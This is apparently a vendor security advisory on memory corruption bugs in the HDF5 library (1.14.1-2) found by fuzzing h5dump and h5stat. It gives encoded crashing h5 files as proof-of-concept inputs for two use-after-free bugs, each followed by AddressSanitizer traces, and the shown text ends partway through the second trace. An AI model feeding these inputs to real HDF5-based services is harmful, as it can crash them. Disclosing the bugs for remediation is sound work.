Pulse Security briefly assessed the HDF5 library (hdf5-1.14.1-2) for memory corruption vulnerabilities as part of a client engagement where the HDF5 library was used to parse potentially untrusted data. Multiple memory corruption issues were found in the HDF5 library by fuzz testing the h5stat and h5dump helper utilities.
Roughly 1 billion test cases were executed using AFL++ and test cases available in the HDF5 source repository as starting inputs. This resulted in 15 unique memory corruption vulnerabilities as determined by a major stack hash when the respective segmentation faults occurred. An input corpus generated by fuzzing h5stat was subsequently used to fuzz the h5dump utility, which uses more of the HDF5 library’s logic. 89 unique memory corruption issues were discovered in h5dump after executing approximately 10 million fuzzed test cases.
The input corpus and crashing testcases are included at the end of this advisory. Further memory corruption issues likely exist in HDF5, and the fuzz testing did not achieve complete coverage over the library’s code base. Integration with oss-fuzz was suggested to the HDF5 project.
Further research regarding practical exploitability of these vulnerabilities against a modern operating system were not performed. The exploitability classifications in this advisory are based on rudimentary analysis of the crashing condition and verbatim output from the GDB exploitable plugin. For example, null pointer de-references are less likely to be exploitable than a write-based heap overflow. This was included to help prioritise remediation and is not intended to provide commentary around the realistic practical exploitability of each crashing test case. Remediation of all memory corruption issues is recommended wherever possible, even without evidence of a weaponised exploit.
Where HDF5 is used to process user-supplied data in a server-side application, such as a mechanism that allows users to upload h5 files, these memory corruption vulnerabilities may be used to trigger a denial of service condition. Further exploit development may allow for remote code execution under this scenario.
The tables and summaries below were sent to the HDFGroup, and the five specific memory corruption issues reported via the newly setup GitHub security advisory page. All testcases and input corpora were provided to HDFGroup. These vulnerabilities remain unresolved in HDF5 at the time of this advisory release.
Use After Free
Summary
An attacker who can control an h5 file parsed by HDF5 can trigger a heap use-after-free conditions. This can lead to a denial-of-service condition, and potentially further issues such as remote code execution depending on the practical exploitability of the use-after-free bugs against modern operating systems.
Impact
An attacker who can control an h5 file or other hdf5 data parsed by a target system can trigger the use-after-free. With the proof-of-concepts below, this could result in denial-of-service conditions in server-side implementations of the HDF5 library.
Use-after-free vulnerabilities may result in remote code execution, depending on the specific exploitability of the vulnerability. Real-world exploitability of this issue in terms of remote-code execution is currently unknown.
H5T__conv_f_f Use After Free
Details
The following heap-use-after-free was found by fuzzing the h5dump helper utility. An attacker who can supply a malicious h5 file can trigger a heap use-after-free. The freed object was allocated, freed and subsequently used in a READ operation from H5T__conv_f_f.
PoC
The following PoC shows the ASAN output detailing the use-after-free condition.
$ echo "H4sIAAAAAAAAA7VVPWzTUBA+5w8nFHBApAEVxUgsbAlNELA820pKykArCjNNk6IuIGHowIQZ2RAM/EkMDLCyARuKhDAbCys/EhEdqZAQQghz771zYpPEjhB8st/Lvee7797du8v1Zn1uW25vDjhUFVKgQRIG8AhFNSgb/f1nCYhEs2Eu8rlMsk6zk4nWO32q0QBQ+vwSnzx//0hazmqkFcc/xddotv8ML/4TxEc+5OFqYMntQse1eD62jDO9qYxadmg2xFiMohWfZt9hdCfykpAOSZoYn1BO18glhdb/BiNPBTyN+/H1fiiQACU1uE955FIwgndIXh6yl+E2Vd+wFuOzosi0/SL97bR+qIyoVY5WatVqreKhwaIwqSSkge9UPLygdOihiRtkwcB304/xa9YQMyYYXIvXUFqQu2ZMXILoSYf/Ab4w05ntu7N4LQm3xLrD5P4HZt0f7Jdvz4Is+wfGGYG37PAfx5Fh0ExjDGO+9JPbN+/d5RgfDmn/JZvz9/e5Fv+VAQcvrGbdPDCPT5cd9/dFvbyneqlbku0FawodaZ+nXPYNx5p5dRGfp2ye9HcSf1bIDy3p33N2IuDfQWw/SycX6gp66PefjZg+6CMbFLDmPgdEecN2hRWcyeyGsJGM/4bwhtUF8aOulHtDfSAXkiY85hB2xOybtt26snBu6bK93l5Zt1cv0bp/vf1OkoRlXppQoNpvnb3QOr8az69holAF+4QOK6STgj2ROvyOzpQLwJmmVDiGnflxW+hq0Inhy+uM7oYB1a1Q240p6RDvUFcshcUCBnkK5/Zayx55PGc0J785PDYtHsuAYgrCbSLxLUxc1UuCj59zWoVp/g/0GzjDVA8YCAAA" | base64 -d | gunzip -c > f73304be7d3e45624d4f6651c0688b35
$ ./hdf5/bin/h5dump f73304be7d3e45624d4f6651c0688b35
HDF5 "f73304be7d3e45624d4f6651c0688b35" {
GROUP "/" {
DATASET "ArrayOfStrucbures" {
DATATYPE H5T_COMPOUND {
32-bit little-endian integer 32-bit precision "a_name";
11632864-bit big-endian floating-point 32-bit precision "b_name";
64-bit little-endian floating-point 64-bit precision "c_name";
H5T_COMPOUND {
H5T_STRING {
STRSIZE 1;
STRPAD H5T_STR_NULLTERM;
CSET H5T_CSET_ASCII;
CTYPE H5T_C_S1;
} "char_name";
H5T_ARRAY { [62978] undefined bitfield } "array_name";
} "d_name";
}
DATASPACE SIMPLE { ( 254 ) / ( 254 ) }
=================================================================
==1235==ERROR: AddressSanitizer: heap-use-after-free on address 0x7f0561b9b887 at pc 0x7f056ae87b34 bp 0x7ffda79b4e10 sp 0x7ffda79b4e08
READ of size 1 at 0x7f0561b9b887 thread T0
#0 0x7f056ae87b33 in H5T__conv_f_f /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:4428
#1 0x7f056ae4687a in H5T_convert /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5T.c:5449
#2 0x7f056ae79489 in H5T__conv_struct /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:2308
#3 0x7f056ae4687a in H5T_convert /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5T.c:5449
#4 0x7f056aa28b3b in H5D__scatgath_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dscatgath.c:545
#5 0x7f056a9e6221 in H5D__contig_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dcontig.c:870
#6 0x7f056aa1c5d7 in H5D__read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dio.c:380
#7 0x7f056afd1ee8 in H5VL__native_dataset_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_dataset.c:360
#8 0x7f056afa1afc in H5VL__dataset_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2047
#9 0x7f056afa1afc in H5VL_dataset_read_direct /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2090
#10 0x7f056a990a0b in H5D__read_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:1011
#11 0x7f056a998444 in H5Dread /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:1067
#12 0x55f6883c946c (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x5b46c)
#13 0x55f6883de18d (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x7018d)
#14 0x55f688397c9f (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x29c9f)
#15 0x55f6883a0947 (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x32947)
#16 0x7f056ab7b14e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:865
#17 0x7f056ab7b14e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:838
#18 0x7f056ab8c212 in H5G__node_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gnode.c:966
#19 0x7f056a906721 in H5B__iterate_helper /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1151
#20 0x7f056a90a05e in H5B_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1193
#21 0x7f056ab9ac79 in H5G__stab_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gstab.c:535
#22 0x7f056ab933d7 in H5G__obj_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gobj.c:671
#23 0x7f056ab7dd71 in H5G_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:921
#24 0x7f056ac35c0f in H5L_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Lint.c:2246
#25 0x7f056afdd455 in H5VL__native_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_link.c:366
#26 0x7f056afb4095 in H5VL__link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5482
#27 0x7f056afb4095 in H5VL_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5516
#28 0x7f056ac2161a in H5L__iterate_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1661
#29 0x7f056ac2161a in H5Literate2 /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1697
#30 0x55f688396be4 (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x28be4)
#31 0x55f68838f1c7 (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x211c7)
#32 0x7f056a538d09 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x23d09)
#33 0x55f688391649 (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x23649)
0x7f0561b9b887 is located 565383 bytes inside of 1454108-byte region [0x7f0561b11800,0x7f0561c7481c)
freed by thread T0 here:
#0 0x7f056b38fb6f in __interceptor_free ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:123
#1 0x7f056ae8711a in H5T__conv_f_f /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:4848
#2 0x7f056ae4687a in H5T_convert /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5T.c:5449
#3 0x7f056ae79489 in H5T__conv_struct /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:2308
#4 0x7f056ae4687a in H5T_convert /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5T.c:5449
#5 0x7f056aa28b3b in H5D__scatgath_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dscatgath.c:545
#6 0x7f056a9e6221 in H5D__contig_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dcontig.c:870
#7 0x7f056aa1c5d7 in H5D__read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dio.c:380
#8 0x7f056afd1ee8 in H5VL__native_dataset_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_dataset.c:360
#9 0x7f056afa1afc in H5VL__dataset_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2047
#10 0x7f056afa1afc in H5VL_dataset_read_direct /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2090
#11 0x7f056a990a0b in H5D__read_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:1011
#12 0x7f056a998444 in H5Dread /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:1067
#13 0x55f6883c946c (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x5b46c)
#14 0x55f6883de18d (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x7018d)
#15 0x55f688397c9f (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x29c9f)
#16 0x55f6883a0947 (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x32947)
#17 0x7f056ab7b14e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:865
#18 0x7f056ab7b14e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:838
#19 0x7f056ab8c212 in H5G__node_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gnode.c:966
#20 0x7f056a906721 in H5B__iterate_helper /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1151
#21 0x7f056a90a05e in H5B_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1193
#22 0x7f056ab9ac79 in H5G__stab_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gstab.c:535
#23 0x7f056ab933d7 in H5G__obj_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gobj.c:671
#24 0x7f056ab7dd71 in H5G_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:921
#25 0x7f056ac35c0f in H5L_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Lint.c:2246
#26 0x7f056afdd455 in H5VL__native_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_link.c:366
#27 0x7f056afb4095 in H5VL__link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5482
#28 0x7f056afb4095 in H5VL_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5516
#29 0x7f056ac2161a in H5L__iterate_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1661
#30 0x7f056ac2161a in H5Literate2 /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1697
#31 0x55f688396be4 (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x28be4)
#32 0x55f68838f1c7 (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x211c7)
#33 0x7f056a538d09 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x23d09)
previously allocated by thread T0 here:
#0 0x7f056b390037 in __interceptor_calloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:154
#1 0x7f056ae85a86 in H5T__conv_f_f /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:4388
#2 0x7f056ae4687a in H5T_convert /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5T.c:5449
#3 0x7f056ae79489 in H5T__conv_struct /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:2308
#4 0x7f056ae4687a in H5T_convert /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5T.c:5449
#5 0x7f056aa28b3b in H5D__scatgath_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dscatgath.c:545
#6 0x7f056a9e6221 in H5D__contig_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dcontig.c:870
#7 0x7f056aa1c5d7 in H5D__read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dio.c:380
#8 0x7f056afd1ee8 in H5VL__native_dataset_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_dataset.c:360
#9 0x7f056afa1afc in H5VL__dataset_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2047
#10 0x7f056afa1afc in H5VL_dataset_read_direct /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2090
#11 0x7f056a990a0b in H5D__read_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:1011
#12 0x7f056a998444 in H5Dread /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:1067
#13 0x55f6883c946c (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x5b46c)
#14 0x55f6883de18d (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x7018d)
#15 0x55f688397c9f (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x29c9f)
#16 0x55f6883a0947 (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x32947)
#17 0x7f056ab7b14e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:865
#18 0x7f056ab7b14e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:838
#19 0x7f056ab8c212 in H5G__node_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gnode.c:966
#20 0x7f056a906721 in H5B__iterate_helper /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1151
#21 0x7f056a90a05e in H5B_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1193
#22 0x7f056ab9ac79 in H5G__stab_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gstab.c:535
#23 0x7f056ab933d7 in H5G__obj_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gobj.c:671
#24 0x7f056ab7dd71 in H5G_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:921
#25 0x7f056ac35c0f in H5L_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Lint.c:2246
#26 0x7f056afdd455 in H5VL__native_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_link.c:366
#27 0x7f056afb4095 in H5VL__link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5482
#28 0x7f056afb4095 in H5VL_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5516
#29 0x7f056ac2161a in H5L__iterate_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1661
#30 0x7f056ac2161a in H5Literate2 /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1697
#31 0x55f688396be4 (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x28be4)
#32 0x55f68838f1c7 (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x211c7)
#33 0x7f056a538d09 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x23d09)
SUMMARY: AddressSanitizer: heap-use-after-free /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:4428 in H5T__conv_f_f
Shadow bytes around the buggy address:
0x0fe12c36b6c0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0fe12c36b6d0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0fe12c36b6e0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0fe12c36b6f0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0fe12c36b700: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=>0x0fe12c36b710:[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0fe12c36b720: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0fe12c36b730: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0fe12c36b740: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0fe12c36b750: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0fe12c36b760: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==1235==ABORTING
H5T__conv_struct_opt Use After Free
Details
The following heap-use-after-free was found by fuzzing the h5dump helper utility. An attacker who can supply a malicious h5 file can trigger a heap use-after-free. The freed object is referenced in a memmove call from H5T__conv_struct_opt. The original object was allocated by H5D__typeinfo_init_phase3 and freed by H5D__typeinfo_term.
PoC
The following PoC shows the ASAN output detailing the use-after-free condition.
$ echo "H4sIAAAAAAAAA+v0cHHj5ZLiYgABDg4GFgYBBmYGBPgPBRIcCD4DAxNcfgcTkmIGFA4YeLg6BoBoAyhfAUo3sGEoRQEhQa6uDAyMcPthACZvwQqhOfAbA/PFZ6KU4QTMhJVQA6SAiHr62EUEUBhoB+ABjMC0xsiCcKMgMN0yAukZUH4Chno2kDwHWBEQCAAhCGyApsMMRpg6iDgjlP8Pqp8PKm5kAASmhpaGpiYmpoYgAyXARjIyQTT8gCYVUIaCuG0C+Z5ci1/6KWEToL7AkjFRwAd7xwZjIH3iEBA7BTQyQzU22EPkH9g7zUbIG0w3hhrY4BAKBlftncF8iDxIDhIMAo4Q/RfsXZDkQUHOAtHvOGsmCJy0d0XTD8ne5o4Q84/au0HkG0DyIBYk2gScJql4AtEhe3eY/pQTTiC72cF8FyeI/QfsPdDsh5QbDU4yCoUyxwv32Hui2c8J5i9ygrhvp70XkrwmsPgJ9vN3YQSGEqz8eUEghMkGDTQylwTw/w0ZmuRQufwElDsWFSVW+qcFlxSVJpeUFqUWQ8VhCVgASjMzJICzphg07yfG5yXmpqIpxgIEOGBpToEhF6qHhYCbBBXk4XrEORjEQSVzMlQvoXpHUMEeqsaBwYSbwVQUmChToHoF0BXLo7iUQQyYlniAdHJGYhGy9wgBYQZIECSCwhJJIwswEYHEW+AA0588MH/W/wf7EwBLcXcCGAgAAA==" | base64 -d | gunzip -c > 77d3cad25d20e9298344223c8d2d0eaa
$ ./hdf5/bin/h5dump 77d3cad25d20e9298344223c8d2d0eaa
HDF5 "77d3cad25d20e9298344223c8d2d0eaa" {
GROUP "/" {
DATASET "ArrayOfStructures" {
DATATYPE H5T_COMPOUND {
H5T_STD_I32LE "a_name";
H5T_IEEE_F32LE "m_name";
64-bit little-endian floating-point 64-bit precision "c_name";
H5T_COMPOUND {
H5T_STRING {
STRSIZE 1;
STRPAD H5T_STR_NULLTERM;
CSET H5T_CSET_ASCII;
CTYPE H5T_C_S1;
} "char_name";
H5T_ARRAY { [33924] 96-bit little-endian floating-point 32-bit precision } "array_name";
} "d_name";
}
DATASPACE SIMPLE { ( 254 ) / ( 254 ) }
=================================================================
==1205==ERROR: AddressSanitizer: heap-use-after-free on address 0x7f790a85081c at pc 0x7f7910e96541 bp 0x7fff5e17aea0 sp 0x7fff5e17a650
READ of size 407088 at 0x7f790a85081c thread T0
#0 0x7f7910e96540 in __interceptor_memmove ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:789
#1 0x7f79109f1b7f in H5T__conv_struct_opt /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:2599
#2 0x7f79109bd87a in H5T_convert /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5T.c:5449
#3 0x7f79109f2171 in H5T__conv_struct_opt /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:2586
#4 0x7f79109bd87a in H5T_convert /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5T.c:5449
#5 0x7f791059fb3b in H5D__scatgath_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dscatgath.c:545
#6 0x7f791055d221 in H5D__contig_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dcontig.c:870
#7 0x7f79105935d7 in H5D__read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dio.c:380
#8 0x7f7910b48ee8 in H5VL__native_dataset_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_dataset.c:360
#9 0x7f7910b18afc in H5VL__dataset_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2047
#10 0x7f7910b18afc in H5VL_dataset_read_direct /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2090
#11 0x7f7910507a0b in H5D__read_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:1011
#12 0x7f791050f444 in H5Dread /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:1067
#13 0x558ffe91546c (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x5b46c)
#14 0x558ffe92a18d (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x7018d)
#15 0x558ffe8e3c9f (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x29c9f)
#16 0x558ffe8ec947 (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x32947)
#17 0x7f79106f214e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:865
#18 0x7f79106f214e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:838
#19 0x7f7910703212 in H5G__node_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gnode.c:966
#20 0x7f791047d721 in H5B__iterate_helper /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1151
#21 0x7f791048105e in H5B_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1193
#22 0x7f7910711c79 in H5G__stab_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gstab.c:535
#23 0x7f791070a3d7 in H5G__obj_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gobj.c:671
#24 0x7f79106f4d71 in H5G_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:921
#25 0x7f79107acc0f in H5L_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Lint.c:2246
#26 0x7f7910b54455 in H5VL__native_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_link.c:366
#27 0x7f7910b2b095 in H5VL__link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5482
#28 0x7f7910b2b095 in H5VL_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5516
#29 0x7f791079861a in H5L__iterate_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1661
#30 0x7f791079861a in H5Literate2 /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1697
#31 0x558ffe8e2be4 (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x28be4)
#32 0x558ffe8db1c7 (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x211c7)
#33 0x7f79100afd09 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x23d09)
#34 0x558ffe8dd649 (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x23649)
0x7f790a865808 is located 0 bytes to the right of 1048584-byte region [0x7f790a765800,0x7f790a865808)
freed by thread T0 here:
#0 0x7f7910f06b6f in __interceptor_free ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:123
#1 0x7f79106aed3e in H5FL__blk_gc_list /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5FL.c:1203
#2 0x7f79106b0b07 in H5FL_blk_free /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5FL.c:1067
#3 0x7f7910591aa7 in H5D__typeinfo_term /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dio.c:1505
#4 0x7f7910591aa7 in H5D__typeinfo_term /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dio.c:1494
#5 0x7f7910591aa7 in H5D__read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dio.c:430
#6 0x7f7910b48ee8 in H5VL__native_dataset_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_dataset.c:360
#7 0x7f7910b18afc in H5VL__dataset_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2047
#8 0x7f7910b18afc in H5VL_dataset_read_direct /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2090
#9 0x7f7910507a0b in H5D__read_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:1011
#10 0x7f791050f444 in H5Dread /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:1067
#11 0x558ffe91546c (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x5b46c)
#12 0x558ffe92a18d (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x7018d)
#13 0x558ffe8e3c9f (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x29c9f)
#14 0x558ffe8ec947 (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x32947)
#15 0x7f79106f214e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:865
#16 0x7f79106f214e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:838
#17 0x7f7910703212 in H5G__node_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gnode.c:966
#18 0x7f791047d721 in H5B__iterate_helper /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1151
#19 0x7f791048105e in H5B_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1193
#20 0x7f7910711c79 in H5G__stab_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gstab.c:535
#21 0x7f791070a3d7 in H5G__obj_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gobj.c:671
#22 0x7f79106f4d71 in H5G_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:921
#23 0x7f79107acc0f in H5L_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Lint.c:2246
#24 0x7f7910b54455 in H5VL__native_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_link.c:366
#25 0x7f7910b2b095 in H5VL__link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5482
#26 0x7f7910b2b095 in H5VL_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5516
#27 0x7f791079861a in H5L__iterate_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1661
